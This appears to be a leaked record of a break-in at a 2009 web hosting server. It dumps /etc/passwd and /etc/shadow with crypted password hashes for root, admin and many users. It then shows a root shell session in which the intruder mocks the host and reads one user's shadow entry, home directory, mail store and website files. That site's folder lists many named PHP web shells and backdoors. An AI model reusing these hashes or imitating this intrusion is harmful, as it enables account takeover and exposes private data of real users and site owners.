furiogamin:x:516:517::/home/furiogamin:/bin/false
kaza:x:517:518::/home/kaza:/bin/false
pimpinjg:x:518:519::/home/pimpinjg:/bin/false
dakilla:x:521:522::/home/dakilla:/bin/false
bootroot:x:522:523::/home/bootroot:/bin/false
scraft758:x:525:526::/home/scraft758:/bin/false
hstrike:x:526:527::/home/hstrike:/bin/false
romeo:x:528:529::/home/romeo:/bin/false
xckx:x:529:530::/home/xckx:/bin/false
h3mod:x:530:531::/home/h3mod:/bin/false
clamav:x:533:534:Clam AntiVirus:/home/clamav:/bin/false
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
avahi-autoipd:x:105:105:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
hbxmike:x:535:536::/home/hbxmike:/bin/false
wtfsmilez:x:536:537::/home/wtfsmilez:/bin/false
haiobr:x:537:538::/home/haiobr:/bin/false
odin:x:538:539::/home/odin:/bin/false
sam:x:539:540::/home/sam:/bin/false
mrgod:x:540:541::/home/mrgod:/bin/false
pagewiz:x:541:542::/home/pagewiz:/bin/false
zer0:x:542:543::/home/zer0:/bin/false
dablitz:x:543:544::/home/dablitz:/bin/false
ristop:x:544:545::/home/ristop:/bin/false
bloo:x:545:546::/home/bloo:/bin/false
root:$1$tilqrnIQ$fm2riVHK6dHchHIblFr/f1:14380:0:99999:7:::
bin:*:14253:0:99999:7:::
daemon:*:14253:0:99999:7:::
shutdown:*:14253:0:99999:7:::
halt:*:14253:0:99999:7:::
mail:*:14253:0:99999:7:::
ftp:*:14253:0:99999:7:::
nobody:*:14253:0:99999:7:::
dbus:!!:14253:0:99999:7:::
nscd:!!:14253:0:99999:7:::
vcsa:!!:14253:0:99999:7:::
rpc:!!:14253:0:99999:7:::
sshd:!!:14253:0:99999:7:::
pcap:!!:14253:0:99999:7:::
mailnull:!!:14253:0:99999:7:::
smmsp:!!:14253:0:99999:7:::
rpcuser:!!:14253:0:99999:7:::
nfsnobody:!!:14253:0:99999:7:::
rpm:!!:14253:0:99999:7:::
haldaemon:!!:14253:0:99999:7:::
named:!!:14257::::::
apache:!!:14257::::::
diradmin:!!:14256::::::
mysql:!!:14256::::::
webapps:!!:14256:0:99999:7:::
majordomo:!!:14256::::::
dovecot:!!:14256::::::
admin:$1$hOf0pEJ7$Csc3Cf1boad5jK8A4.gCe1:14379:0:99999:7:::
hrdev:$1$h66VePH.$Q18XKJHV0qQekrkx8DNPa.:14269:0:99999:7:::
keytraderz:$1$apmWxy/L$YuzBwBVn6o87A7gAqMUfj0:14369:0:99999:7:::
yourkicks:$1$IeMgb1QU$qNEVNIQDzjgW5Wt.V5cNs.:14269:0:99999:7:::
aaa:$1$Pvq5Ze1q$Nn1bNt8aTVT7VaBCZFuMr1:14269:0:99999:7:::
beyond:$1$gYlYPXOA$qMQTQ0gTMkqkeI3exuI5F0:14269:0:99999:7:::
hotglow:$1$UL8Osrrl$pKpDOHKiBcj2a5NBN1n1M1:14269:0:99999:7:::
wheelglow:$1$7CfmCRZb$TXXEzsFamBKkk7L10qKEn1:14269:0:99999:7:::
penguin:!$1$NKcb5Ati$z.YERAUu8ADbbo8XId6.e.:14269:0:99999:7:::
ntp:!!:14273::::::
furiogamin:$1$ehClK7ld$2OchIgSTZ1wnYgJnWJe1L/:14278:0:99999:7:::
kaza:$1$QU9IN8sS$cypmbg45B0V0k/a6knhzD0:14278:0:99999:7:::
pimpinjg:$1$D0PGDf.U$6IyagtS0AYLnTXI4DiPmh1:14291:0:99999:7:::
dakilla:$1$Foh0gQdF$NDc4LO/3Otwxt.WXNGb8u1:14383:0:99999:7:::
bootroot:$1$YG4ZItt0$JYuixhSHo9KcJbdm4rumt.:14364:0:99999:7:::
scraft758:$1$BD72wrXX$3SarFSWt249OF71EugOvp1:14292:0:99999:7:::
hstrike:$1$roWSxdvs$X6QfaV/NhsXwqBCTFksL/0:14292:0:99999:7:::
romeo:$1$qx2sTgHs$VHb4bpwE.lRwBFDmjtwPx.:14353:0:99999:7:::
xckx:$1$NsnILOqK$3mGncK6wPMYMsb9vnkOyt/:14293:0:99999:7:::
h3mod:$1$XQo0rcc3$lmySsVMTrIC0ePWPXfOR2/:14293:0:99999:7:::
clamav:!!:14336:0:99999:7:::
avahi:!!:14336::::::
avahi-autoipd:!!:14336::::::
hbxmike:$1$PriF/4Bk$1.j6gBej9aPfrN4BJeDU11:14376:0:99999:7:::
wtfsmilez:$1$NJsG5rdb$X.EqYJhBhWhuAjteubXEK/:14365:0:99999:7:::
haiobr:$1$8WRmEqZ.$.shT4ddM9WHSteJ197DjE1:14385:0:99999:7:::
odin:$1$z5xA/a5f$x4VoN/NQhQshmAei3bZj4.:14379:0:99999:7:::
sam:$1$hQ9R7M26$pDBdZDh01EtAV1DxELrnc1:14376:0:99999:7:::
mrgod:$1$WmNO8283$hpvrrWLnd5Pp/RlcwYvnm/:14377:0:99999:7:::
pagewiz:$1$LgyU4TyH$kpQ.QEZ3mVv.nZQKvzrui0:14383:0:99999:7:::
zer0:$1$KMAddC48$OTyb50QllFSKp4AR4AcsC0:14385:0:99999:7:::
dablitz:$1$xUPbImWk$hDT9R4UAwbsQVyGxpZ.pu/:14386:0:99999:7:::
ristop:$1$9SfY3MtY$n8cHnCN6tY2WvhitNOykh.:14386:0:99999:7:::
bloo:$1$TtV5Q9IB$gi9SWdREB1ikky.Cgmiuu/:14387:0:99999:7:::
root@server2:~[root@server2 ~]# grep romeo /etc/shadow
romeo:$1$qx2sTgHs$VHb4bpwE.lRwBFDmjtwPx.:14353:0:99999:7:::
root@server2:~[root@server2 ~]# w
 04:05:41 up 18:48,  1 user,  load average: 0.34, 0.34, 0.23
USER	 TTY	  FROM		    LOGIN@   IDLE   JCPU   PCPU WHAT
root	 pts/0	  cpe-76-1x5-xx-xx 03:39   26:24   0.00s  0.00s -bash
root@server2:~[root@server2 ~]# ls -al
total 30488
drwxr-x--- 11 root    root	 4096 May 23 02:47 .
drwx--x--x 25 root    root	 4096 May 22 09:26 ..
-rw-------  1 root    root	 1132 Mar 11 01:44 anaconda-ks.cfg
-rw-r--r--  1 root    root	    0 May 20 17:26 authorized_keys2
-rwxr-xr-x  1 root    root	   10 May 23 03:02 .bash_history
-rw-r--r--  1 root    root	   24 Jan  6  2007 .bash_logout
-rw-r--r--  1 root    root	  191 Jan  6  2007 .bash_profile
-rw-r--r--  1 root    root	  176 Jan  6  2007 .bashrc
drwxrwxrwx 24	 1000	1000	 4096 Apr 28 14:55 clamav-0.95.1
-rw-r--r--  1 root    root   24260964 Apr  8 08:24 clamav-0.95.1.tar.gz
-rw-r--r--  1 root    root     171053 May 22 13:49 cleaned_shells_php.txt
drwxr-xr-x  4 root    root	 4096 Mar 18 00:50 .cpan
-rw-r--r--  1 root    root	  100 Jan  6  2007 .cshrc
-rw-r--r--  1 root    root	    4 Jan 12 16:21 .custombuild
-rwxr-xr-x  1 root    root	21171 Jan 13 14:13 da.cpanel.import.pl
-rw-r--r--  1 root    root	  288 Mar 31 05:21 defaults.conf
drwxr-xr-x  2 root    root	 4096 Mar 23 19:03 export
-rw-r--r--  1 root    root	 1155 May 15 22:15 f.c
drwxr-xr-x  3 root    root	 4096 May 12 20:35 forum
-rw-r--r--  1 root    root	  265 May 14 15:19 ifconfig
drwxr-xr-x  2 root    root	 4096 Mar 23 19:03 import
-rw-------  1 root    root	12288 Mar 27 04:26 .import.swp
-rw-r--r--  1 root    root	 1724 Apr  1 18:53 initsec
-rw-------  1 root    root	   97 May 23 04:02 .lesshst
-rw-r--r--  1 root    root	   27 May 23 02:35 load
-rw-------  1 root    root	   42 Feb  5 17:18 .my.cnf
-rw-------  1 root    root	   37 May  2 15:19 .mysql_history
-rw-r--r--  1 root    root	    9 Mar 31 05:21 .mytop
drwxr-xr-x 16 webapps apache	 4096 Apr 28 16:11 nmap-4.85BETA8
-rw-r--r--  1 root    root    6484436 Apr 21 14:38 nmap-4.85BETA8.tar.bz2
drwxr-xr-x  3 root    root	 4096 May 20 14:31 qurantine
-rw-------  1 root    root	 1024 Apr  2 18:01 .rnd
-rwxr-xr-x  1 root    root	 2024 Apr 28 14:44 scan.pl
drwx------  2 root    root	 4096 May 20 15:00 .ssh
-rw-r--r--  1 root    root	  129 Jan  6  2007 .tcshrc
-rw-------  1 root    root	12288 May 23 03:02 .test.swp
drwxr-xr-x  2 root    root	 4096 May 14 14:00 tmp
-rwxr-xr-x  1 root    root	47429 May 16  2008 tuning-primer.sh
root@server2:~[root@server2 ~]# cat .bash_history
exit
exit
root@server2:~[root@server2 ~]# #omg nmap, SECURE HOSTING
root@server2:~[root@server2 ~]# date
Sat May 23 04:06:57 PDT 2009
root@server2:~[root@server2 ~]# cd /home/romeo/
root@server2:/home/romeo[root@server2 romeo]# ls -al
total 44
drwx--x--x  6 romeo romeo 4096 Apr 22 15:51 .
drwx--x--x 36 root  root  4096 May 23 02:33 ..
drwx------  2 romeo romeo 4096 Feb 17 16:07 backups
-rw-r--r--  1 romeo romeo   33 Dec 22 09:57 .bash_logout
-rw-r--r--  1 romeo romeo  176 Dec 22 09:57 .bash_profile
-rw-r--r--  1 romeo romeo  124 Dec 22 09:57 .bashrc
-rw-------  1 romeo romeo    0 Feb  8 08:45 .clipboard.txt
drwx--x--x  4 romeo romeo 4096 Dec 23 14:31 domains
drwxrwx---  4 romeo mail  4096 Feb 17 16:07 imap
drwxrwx---  5 romeo mail  4096 Dec 23 08:29 Maildir
lrwxrwxrwx  1 romeo romeo   35 Feb 17 16:07 public_html ->
./domains/darkmindz.com/public_html
-rw-r-----  1 romeo mail    34 Apr 19 16:26 .shadow
root@server2:/home/romeo[root@server2 romeo]# du -ch Maildir/
4.0K	Maildir/tmp
68M	Maildir/new
4.0K	Maildir/cur
68M	Maildir/
68M	total
root@server2:/home/romeo[root@server2 romeo]# #nice, thanks
root@server2:/home/romeo[root@server2 romeo]# cd domains
root@server2:/home/romeo/domains[root@server2 domains]# ls -la
total 16
drwx--x--x 4 romeo romeo 4096 Dec 23 14:31 .
drwx--x--x 6 romeo romeo 4096 Apr 22 15:51 ..
drwx--x--x 7 romeo romeo 4096 Feb 10 19:26 cybershade.org
drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 darkmindz.com
root@server2:/home/romeo/domains[root@server2 domains]# cd darkmindz.com
root@server2:/home/romeo/domains/darkmindz.com[root@server2 darkmindz.com]# ls
-la
total 40
drwx--x--x  7 romeo romeo  4096 Apr 22 15:53 .
drwx--x--x  4 romeo romeo  4096 Dec 23 14:31 ..
drwxr-xr-x  2 romeo romeo  4096 Dec 22 09:57 .htpasswd
drwxr-xr-x  2 root  root   4096 May 23 00:10 logs
drwx--x--x  3 romeo romeo  4096 Dec 22 09:57 public_ftp
drwxr-xr-x 15 romeo romeo  4096 May 20 14:30 public_html
drwxr-xr-x  2 root  root   4096 May  1 00:10 stats
-rw-r--r--  1 romeo romeo 12151 Feb  9 09:01 view_topic.php
root@server2:/home/romeo/domains/darkmindz.com[root@server2 darkmindz.com]# cd
public_html/
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# ls -al
total 47264
drwxr-xr-x 15 romeo romeo     4096 May 20 14:30 .
drwx--x--x  7 romeo romeo     4096 Apr 22 15:53 ..
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 400.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 401.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 403.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 404.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 500.shtml
-rw-r--r--  1 romeo romeo     5254 Feb 14 06:12 acp.php
-rw-r--r--  1 romeo romeo     9757 Feb 14 06:12 ajax.php
-rw-r--r--  1 romeo romeo     2118 Feb 14 06:12 articles.php
drwxr-xr-x  2 romeo romeo     4096 Mar	4 11:11 _beta
drwxrwxrwx  5 romeo romeo     4096 Mar 26 15:55 cache
drwxr-xr-x  2 romeo romeo     4096 Dec 22 09:57 cgi-bin
-rw-r--r--  1 romeo romeo     5561 Feb 14 06:12 challenges.php
-rw-r--r--  1 romeo romeo     2137 Feb	2 08:43 codebase.php
-rw-r--r--  1 romeo romeo    17251 Jan 13 07:21 convertor.php
drwxr-xr-x  6 romeo romeo     4096 Feb	7 13:38 core
-rw-r--r--  1 romeo romeo	 0 Jan 13 07:21 debug
-rw-r--r--  1 romeo romeo     3266 Dec 22 22:59 eg.gif
-rw-r--r--  1 romeo romeo     5036 Feb 27 17:58 forgotpass.php
-rw-r--r--  1 romeo romeo     7107 Mar	1 11:30 forum.php
-rw-r--r--  1 romeo romeo     2177 Jan 13 07:21 get_shouts.php
-rw-r--r--  1 romeo romeo  1416102 Feb 17 14:24 halo.zip
-rw-r--r--  1 romeo romeo     4546 Feb 19 14:07 .htaccess
-rw-r--r--  1 romeo romeo	36 Jan 13 06:52 .htpasswd
drwxr-xr-x  4 romeo romeo     4096 Feb	8 20:35 images
drwxr-xr-x  2 romeo romeo     4096 Dec 22 22:20 img
-rw-r--r--  1 romeo romeo     3998 Apr 19 16:40 index.php
-rw-r--r--  1 romeo romeo      843 Feb 28 15:13 irc.php
drwxr-xr-x  3 romeo romeo     4096 Feb	7 13:38 language
-rw-r--r--  1 romeo romeo     4103 Feb 19 14:05 latest_posts.php
-rwxrwxrwx  1 romeo romeo     7184 Feb 14 06:12 loader.php
-rw-r--r--  1 romeo romeo     8398 Feb 14 06:12 login.php
-rwxr-xr-x  1 romeo romeo    13954 Sep 15  2006 logo.jpg
-rw-r--r--  1 romeo romeo     3006 Feb	1 21:44 merge.php
drwxr-xr-x 20 romeo romeo     4096 Feb 12 13:44 modules
-rw-r--r--  1 romeo romeo    10964 Feb 14 12:40 pastebin.php
-rw-r--r--  1 romeo romeo    31019 Feb 14 06:12 post.bak.php
-rw-r--r--  1 romeo romeo    35322 Feb 21 08:56 post.php
-rw-r--r--  1 romeo romeo     2142 Feb 14 06:12 privatemessages.php
-rw-r--r--  1 romeo romeo     9747 Feb 22 13:10 register.php
-rw-r--r--  1 romeo romeo     7919 Mar 16 20:00 rss.php
drwxr-xr-x  2 romeo romeo     4096 Feb	7 13:38 scripts
-rw-r--r--  1 romeo romeo     1065 Feb 14 06:12 search.php
-rw-r--r--  1 romeo romeo     1838 Feb 14 06:12 settings.php
drwxr-xr-x  2 root  root      4096 May 20 14:30 shell
-rw-r--r--  1 romeo romeo 46487316 May 23 04:07 stress_test.txt
-rw-r--r--  1 romeo romeo      994 Jan 13 07:22 swiigle_upload.php
drwxr-xr-x  5 romeo romeo     4096 Feb	7 13:38 template
-rw-r--r--  1 romeo romeo      454 Jan 13 07:22 template.php
drwxr-xr-x  2 romeo romeo     4096 Feb 16 21:05 templates
-rw-r--r--  1 romeo romeo      610 Feb 18 08:17 test.php
drwxr-xr-x  2 romeo romeo     4096 Feb	7 13:38 txt docs
-rw-r--r--  1 romeo romeo     2708 Feb 14 06:12 ucp.php
-rw-r--r--  1 romeo romeo     7789 Feb 14 06:12 view_group.bak.php
-rw-r--r--  1 romeo romeo     8556 Mar	1 11:30 view_group.php
-rw-r--r--  1 romeo romeo      876 Feb 14 06:12 view_profile.php
-rw-r--r--  1 romeo romeo    12677 Feb 14 13:16 view_topic.bak.php
-rw-r--r--  1 romeo romeo    12871 Mar	1 11:30 view_topic.php
-rw-r--r--  1 romeo romeo     9571 Feb 14 06:12 windowed_options.php
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# ls -la scripts/
total 476
drwxr-xr-x  2 romeo romeo   4096 Feb  7 13:38 .
drwxr-xr-x 15 romeo romeo   4096 May 20 14:30 ..
-rw-r--r--  1 romeo romeo   4770 Jan 13 12:11 builder.js
-rw-r--r--  1 romeo romeo    588 Jan 13 12:11 cli.js
-rw-r--r--  1 romeo romeo  35851 Jan 13 12:12 controls.js
-rw-r--r--  1 romeo romeo  35253 Jan 13 12:11 dragdrop.js
-rw-r--r--  1 romeo romeo  38986 Jan 13 12:12 effects.js
-rw-r--r--  1 romeo romeo   8663 Feb 14 12:40 functions.js
-rw-r--r--  1 romeo romeo   6897 Jan 13 12:11 growl.js
-rw-r--r--  1 romeo romeo  63854 Jan 13 12:11 lightwindow.js
-rw-r--r--  1 romeo romeo  52665 Jan 13 12:12 php.min.js
-rw-r--r--  1 romeo romeo   1457 Jan 13 12:11 pm.js
-rw-r--r--  1 romeo romeo   1637 Jan 13 12:11 pngfix.js
-rw-r--r--  1 romeo romeo   3261 Jan 13 12:11 proto.menu.js
-rw-r--r--  1 romeo romeo 130380 Jan 13 12:12 prototype.js
-rw-r--r--  1 romeo romeo   2733 Jan 13 12:11 register.js
-rw-r--r--  1 romeo romeo   2711 Jan 13 12:11 scriptaculous.js
-rw-r--r--  1 romeo romeo    121 Jan 13 12:11 shoutbox.js
-rw-r--r--  1 romeo romeo  10296 Jan 13 12:12 slider.js
-rw-r--r--  1 romeo romeo   1920 Jan 13 12:12 sound.js
-rw-r--r--  1 romeo romeo  20197 Jan 13 12:12 unittest.js
-rw-r--r--  1 romeo romeo   6145 Feb 14 12:40 user.php
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# ls -la shell/
total 1564
drwxr-xr-x  2 root  root    4096 May 20 14:30 .
drwxr-xr-x 15 romeo romeo   4096 May 20 14:30 ..
-rw-r--r--  1 romeo romeo   1297 Feb 16 21:05 ajan.txt
-rw-r--r--  1 romeo romeo  44210 Feb 16 21:06 b64.txt
-rw-r--r--  1 romeo romeo    140 Feb 16 21:06 backdoor.txt
-rw-r--r--  1 romeo romeo  11141 Feb 16 21:06 c101.txt
-rw-r--r--  1 romeo romeo   1468 Feb 16 21:06 cmd.txt
-rw-r--r--  1 romeo romeo  18519 Feb 16 21:06 codeanalyzer.txt
-rw-r--r--  1 romeo romeo 114861 Feb 16 21:06 constance.txt
-rw-r--r--  1 romeo romeo  40682 Feb 16 21:06 CrystalShell v.1.txt
-rw-r--r--  1 romeo romeo  83029 Feb 16 21:06 CyberSpy5.txt
-rw-r--r--  1 romeo romeo  43394 Feb 16 21:06 dC3 Security Crew Shell PRiV.txt
-rw-r--r--  1 romeo romeo 111446 Feb 16 21:06 DxShell.1.0.txt
-rw-r--r--  1 romeo romeo  39433 Feb 16 21:06 eko.txt
-rw-r--r--  1 romeo romeo  38479 Feb 16 21:06 ELMALISEKER Backd00r.txt
-rw-r--r--  1 romeo romeo  24829 Feb 16 21:06 GFS web-shell ver 3.1.7 -
PRiV8.txt
-rw-r--r--  1 romeo romeo   2089 Feb 16 21:06 imageshell.JPG
-rw-r--r--  1 romeo romeo   1768 Feb 16 21:06 index.php
-rw-r--r--  1 romeo romeo  17440 Feb 16 21:06 kscript.txt
-rw-r--r--  1 romeo romeo   2342 Feb 16 21:06 l0ger.txt
-rw-r--r--  1 romeo romeo   1683 Feb 16 21:06 LocalLinuxExploitFinder.txt
-rw-r--r--  1 romeo romeo  33796 Feb 16 21:06 Mysql interface v1.0.txt
-rw-r--r--  1 romeo romeo  34398 Feb 16 21:06 mysql.txt
-rw-r--r--  1 romeo romeo  38856 Feb 16 21:06 ntdaddy.txt
-rw-r--r--  1 romeo romeo 124953 Feb 16 21:06 r57.txt
-rw-r--r--  1 romeo romeo 103794 Feb 16 21:06 SnIpEr_SA Shell.txt
-rw-r--r--  1 romeo romeo   7002 Feb 16 21:06 steg.txt
-rw-r--r--  1 romeo romeo 139788 Feb 16 21:06 tdshell.txt
-rw-r--r--  1 romeo romeo  70402 Feb 16 21:06 webadmin.txt
-rw-r--r--  1 romeo romeo   5057 Feb 16 21:06 WinX Shell.txt
-rw-r--r--  1 romeo romeo   2455 Feb 16 21:06 Worse Linux Shell.txt
-rw-r--r--  1 romeo romeo 304936 Feb 16 21:06 x2300_mod.txt
-rw-r--r--  1 romeo romeo  10418 Feb 16 21:06 XSSscan.py.txt
-rw-r--r--  1 romeo romeo  10269 Feb 16 21:06 xx.txt
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# #ELEET
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# ls -al
total 47264
drwxr-xr-x 15 romeo romeo     4096 May 20 14:30 .
drwx--x--x  7 romeo romeo     4096 Apr 22 15:53 ..
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 400.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 401.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 403.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 404.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 500.shtml
-rw-r--r--  1 romeo romeo     5254 Feb 14 06:12 acp.php
-rw-r--r--  1 romeo romeo     9757 Feb 14 06:12 ajax.php
-rw-r--r--  1 romeo romeo     2118 Feb 14 06:12 articles.php
drwxr-xr-x  2 romeo romeo     4096 Mar	4 11:11 _beta
drwxrwxrwx  5 romeo romeo     4096 Mar 26 15:55 cache
drwxr-xr-x  2 romeo romeo     4096 Dec 22 09:57 cgi-bin
-rw-r--r--  1 romeo romeo     5561 Feb 14 06:12 challenges.php
-rw-r--r--  1 romeo romeo     2137 Feb	2 08:43 codebase.php
-rw-r--r--  1 romeo romeo    17251 Jan 13 07:21 convertor.php
drwxr-xr-x  6 romeo romeo     4096 Feb	7 13:38 core
-rw-r--r--  1 romeo romeo	 0 Jan 13 07:21 debug
-rw-r--r--  1 romeo romeo     3266 Dec 22 22:59 eg.gif
-rw-r--r--  1 romeo romeo     5036 Feb 27 17:58 forgotpass.php
-rw-r--r--  1 romeo romeo     7107 Mar	1 11:30 forum.php
-rw-r--r--  1 romeo romeo     2177 Jan 13 07:21 get_shouts.php
-rw-r--r--  1 romeo romeo  1416102 Feb 17 14:24 halo.zip
-rw-r--r--  1 romeo romeo     4546 Feb 19 14:07 .htaccess
-rw-r--r--  1 romeo romeo	36 Jan 13 06:52 .htpasswd
drwxr-xr-x  4 romeo romeo     4096 Feb	8 20:35 images
drwxr-xr-x  2 romeo romeo     4096 Dec 22 22:20 img
-rw-r--r--  1 romeo romeo     3998 Apr 19 16:40 index.php
-rw-r--r--  1 romeo romeo      843 Feb 28 15:13 irc.php
drwxr-xr-x  3 romeo romeo     4096 Feb	7 13:38 language
-rw-r--r--  1 romeo romeo     4103 Feb 19 14:05 latest_posts.php
-rwxrwxrwx  1 romeo romeo     7184 Feb 14 06:12 loader.php
-rw-r--r--  1 romeo romeo     8398 Feb 14 06:12 login.php
-rwxr-xr-x  1 romeo romeo    13954 Sep 15  2006 logo.jpg
-rw-r--r--  1 romeo romeo     3006 Feb	1 21:44 merge.php
drwxr-xr-x 20 romeo romeo     4096 Feb 12 13:44 modules
-rw-r--r--  1 romeo romeo    10964 Feb 14 12:40 pastebin.php
-rw-r--r--  1 romeo romeo    31019 Feb 14 06:12 post.bak.php
-rw-r--r--  1 romeo romeo    35322 Feb 21 08:56 post.php
-rw-r--r--  1 romeo romeo     2142 Feb 14 06:12 privatemessages.php
-rw-r--r--  1 romeo romeo     9747 Feb 22 13:10 register.php
-rw-r--r--  1 romeo romeo     7919 Mar 16 20:00 rss.php
drwxr-xr-x  2 romeo romeo     4096 Feb	7 13:38 scripts
-rw-r--r--  1 romeo romeo     1065 Feb 14 06:12 search.php
-rw-r--r--  1 romeo romeo     1838 Feb 14 06:12 settings.php
drwxr-xr-x  2 root  root      4096 May 20 14:30 shell
-rw-r--r--  1 romeo romeo 46488303 May 23 04:08 stress_test.txt
-rw-r--r--  1 romeo romeo      994 Jan 13 07:22 swiigle_upload.php
drwxr-xr-x  5 romeo romeo     4096 Feb	7 13:38 template
-rw-r--r--  1 romeo romeo      454 Jan 13 07:22 template.php
drwxr-xr-x  2 romeo romeo     4096 Feb 16 21:05 templates
-rw-r--r--  1 romeo romeo      610 Feb 18 08:17 test.php
drwxr-xr-x  2 romeo romeo     4096 Feb	7 13:38 txt docs
-rw-r--r--  1 romeo romeo     2708 Feb 14 06:12 ucp.php
-rw-r--r--  1 romeo romeo     7789 Feb 14 06:12 view_group.bak.php
-rw-r--r--  1 romeo romeo     8556 Mar	1 11:30 view_group.php
-rw-r--r--  1 romeo romeo      876 Feb 14 06:12 view_profile.php
-rw-r--r--  1 romeo romeo    12677 Feb 14 13:16 view_topic.bak.php
-rw-r--r--  1 romeo romeo    12871 Mar	1 11:30 view_topic.php
-rw-r--r--  1 romeo romeo     9571 Feb 14 06:12 windowed_options.php
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# cat test.php
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# ls -la
total 47264
drwxr-xr-x 15 romeo romeo     4096 May 20 14:30 .
drwx--x--x  7 romeo romeo     4096 Apr 22 15:53 ..
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 400.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 401.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 403.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 404.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 500.shtml
-rw-r--r--  1 romeo romeo     5254 Feb 14 06:12 acp.php
-rw-r--r--  1 romeo romeo     9757 Feb 14 06:12 ajax.php
-rw-r--r--  1 romeo romeo     2118 Feb 14 06:12 articles.php
drwxr-xr-x  2 romeo romeo     4096 Mar	4 11:11 _beta
drwxrwxrwx  5 romeo romeo     4096 Mar 26 15:55 cache
drwxr-xr-x  2 romeo romeo     4096 Dec 22 09:57 cgi-bin
-rw-r--r--  1 romeo romeo     5561 Feb 14 06:12 challenges.php
-rw-r--r--  1 romeo romeo     2137 Feb	2 08:43 codebase.php
-rw-r--r--  1 romeo romeo    17251 Jan 13 07:21 convertor.php
drwxr-xr-x  6 romeo romeo     4096 Feb	7 13:38 core
-rw-r--r--  1 romeo romeo	 0 Jan 13 07:21 debug
-rw-r--r--  1 romeo romeo     3266 Dec 22 22:59 eg.gif
-rw-r--r--  1 romeo romeo     5036 Feb 27 17:58 forgotpass.php
-rw-r--r--  1 romeo romeo     7107 Mar	1 11:30 forum.php
-rw-r--r--  1 romeo romeo     2177 Jan 13 07:21 get_shouts.php
-rw-r--r--  1 romeo romeo  1416102 Feb 17 14:24 halo.zip
-rw-r--r--  1 romeo romeo     4546 Feb 19 14:07 .htaccess
-rw-r--r--  1 romeo romeo	36 Jan 13 06:52 .htpasswd
drwxr-xr-x  4 romeo romeo     4096 Feb	8 20:35 images
drwxr-xr-x  2 romeo romeo     4096 Dec 22 22:20 img
-rw-r--r--  1 romeo romeo     3998 Apr 19 16:40 index.php
-rw-r--r--  1 romeo romeo      843 Feb 28 15:13 irc.php
drwxr-xr-x  3 romeo romeo     4096 Feb	7 13:38 language
-rw-r--r--  1 romeo romeo     4103 Feb 19 14:05 latest_posts.php
-rwxrwxrwx  1 romeo romeo     7184 Feb 14 06:12 loader.php
-rw-r--r--  1 romeo romeo     8398 Feb 14 06:12 login.php
-rwxr-xr-x  1 romeo romeo    13954 Sep 15  2006 logo.jpg
-rw-r--r--  1 romeo romeo     3006 Feb	1 21:44 merge.php
drwxr-xr-x 20 romeo romeo     4096 Feb 12 13:44 modules
-rw-r--r--  1 romeo romeo    10964 Feb 14 12:40 pastebin.php
-rw-r--r--  1 romeo romeo    31019 Feb 14 06:12 post.bak.php
-rw-r--r--  1 romeo romeo    35322 Feb 21 08:56 post.php
-rw-r--r--  1 romeo romeo     2142 Feb 14 06:12 privatemessages.php
-rw-r--r--  1 romeo romeo     9747 Feb 22 13:10 register.php
-rw-r--r--  1 romeo romeo     7919 Mar 16 20:00 rss.php
drwxr-xr-x  2 romeo romeo     4096 Feb	7 13:38 scripts
-rw-r--r--  1 romeo romeo     1065 Feb 14 06:12 search.php
-rw-r--r--  1 romeo romeo     1838 Feb 14 06:12 settings.php
drwxr-xr-x  2 root  root      4096 May 20 14:30 shell
-rw-r--r--  1 romeo romeo 46488756 May 23 04:08 stress_test.txt
-rw-r--r--  1 romeo romeo      994 Jan 13 07:22 swiigle_upload.php
drwxr-xr-x  5 romeo romeo     4096 Feb	7 13:38 template
-rw-r--r--  1 romeo romeo      454 Jan 13 07:22 template.php
drwxr-xr-x  2 romeo romeo     4096 Feb 16 21:05 templates
-rw-r--r--  1 romeo romeo      610 Feb 18 08:17 test.php
drwxr-xr-x  2 romeo romeo     4096 Feb	7 13:38 txt docs
-rw-r--r--  1 romeo romeo     2708 Feb 14 06:12 ucp.php
-rw-r--r--  1 romeo romeo     7789 Feb 14 06:12 view_group.bak.php
-rw-r--r--  1 romeo romeo     8556 Mar	1 11:30 view_group.php
-rw-r--r--  1 romeo romeo      876 Feb 14 06:12 view_profile.php
-rw-r--r--  1 romeo romeo    12677 Feb 14 13:16 view_topic.bak.php
-rw-r--r--  1 romeo romeo    12871 Mar	1 11:30 view_topic.php
-rw-r--r--  1 romeo romeo     9571 Feb 14 06:12 windowed_options.php
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# less ucp.php
is_online){redirect("/".root()."index.php");}

$mode = isset($_GET['settings']) ? secureit($_GET['settings']) : 'default';
$auid = (int)isset($_GET['uid']) ? $_GET['uid'] : '';
$switch = isset($_GET['action']) ? $_GET['action'] : '';

$uid = $config['global']['user']['id'];
if((int)isset($_GET['uid']) &&
$_user->check_permissions($config['global']['user
']['id'], ($mode!='avatar' ? GMOD : MOD)) ){
    $uid = (int)$_GET['uid'];
}else{
    $uid = $config['global']['user']['id'];
ucp.php root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# cd core
root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
core]# ls -al
total 164
drwxr-xr-x  6 romeo romeo  4096 Feb  7 13:38 .
